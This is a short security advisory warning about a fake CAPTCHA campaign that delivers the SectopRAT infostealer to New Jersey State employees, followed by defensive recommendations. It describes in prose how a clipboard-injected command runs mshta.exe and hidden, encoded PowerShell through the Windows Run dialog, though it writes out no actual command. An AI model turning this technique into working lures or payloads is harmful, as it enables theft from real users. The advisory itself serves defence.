A recently discovered fake CAPTCHA malware campaign sent to New Jersey State employees in an attempt to deliver the SectopRAT infostealer. The emails contain links directing targets to malicious or compromised websites and prompting deceptive CAPTCHA verification challenges. In the background, the visited website copies a command to the target’s clipboard. The CAPTCHA prompts the target to verify their identity by opening a Windows Run dialog box and running the paste command.

The first part of the command triggers a legitimate Windows executable, mshta[.]exe, to fetch a malicious file from the specified domain and run it. The file type can be html, mp3, mp4, jpg, jpeg, swf, and others. This first part of the command is purposefully obfuscated so that the target only sees the last part of the pasted content stating “I am not a robot – reCAPTCHA Verification ID: ####” in the Windows Run dialog box, which prompts the user to click OK to verify their identity. If completed, the encoded PowerShell command runs in the background, and the target inadvertently downloads and executes SectopRAT.

Further analysis indicated that the identified compromised websites used technologies such as the WordPress Content Management System (CMS) platform and JavaScript Libraries. A possible point of entry was an outdated PHP form that allowed threat actors to access the system and inject the malicious code. Additionally, the redirect links pointed to URLs of newly registered domains.

What You Should Do

  • If you encounter a suspicious CAPTCHA verification challenge, refrain from visiting the website or taking further action.
  • Keep browsers and anti-virus/anti-malware software up to date.
  • Keep systems up to date and apply patches after appropriate testing.
  • Disable JavaScript in the browser before visiting unknown websites.
  • Website administrators are advised to remove the malicious code and ensure the website is patched and updated.
  • Verify all administrators and update the administrative credentials for the CMS platform.

Have Questions?  Reach out to BMT for assistance!